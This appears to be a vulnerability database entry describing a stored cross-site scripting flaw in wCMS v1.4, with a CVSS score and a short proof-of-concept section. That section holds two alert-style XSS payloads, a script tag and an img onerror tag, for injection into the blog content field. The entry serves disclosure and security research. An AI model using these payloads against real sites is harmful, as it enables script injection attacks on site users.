wCMS v.1.4 is vulnerable to Cross Site Scripting (XSS) when creating a new blog.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
wCMS v1.4
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for Stored XSS in wCMS v1.4 -->
<!-- Inject this payload into the 'Blog Content' field when creating a new blog -->
<script>
alert('CVE-2026-38669 XSS Triggered');
</script>
<!-- Alternative payload using image tag -->
<img src=x onerror=alert('CVE-2026-38669 XSS')>